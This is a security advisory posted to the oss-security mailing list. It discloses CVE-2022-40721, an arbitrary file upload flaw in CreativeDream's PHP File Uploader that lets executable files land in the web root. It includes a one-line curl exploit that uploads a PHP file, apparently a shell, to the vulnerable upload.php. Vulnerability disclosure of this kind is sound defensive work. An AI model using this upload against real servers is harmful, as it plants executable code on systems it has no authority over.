Date: Mon, 3 Oct 2022 12:17:43 -0400 From: Larry Cashdollar <larry0@...com> To: oss-security@...ts.openwall.com Subject: CreativeDream software arbitrary file upload Title: CreativeDream software arbitrary file upload Author: Larry W. Cashdollar Date: 2022-09-08 CVE-ID:[CVE-2022-40721] Download Site: https://github.com/CreativeDream Vendor: CreativeDream Vendor Notified: 2020-02-19 Vendor Contact: yuliangagarin [at] mail.ru References: https://github.com/CreativeDream/php-uploader/issues/23 Advisory: http://www.vapidlabs.com/advisory.php?v=216 Description: PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver. Vulnerability: The software allows executable file uploads to the web root directory. Export: JSON TEXT XML Exploit Code: • curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@...ll.php"
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.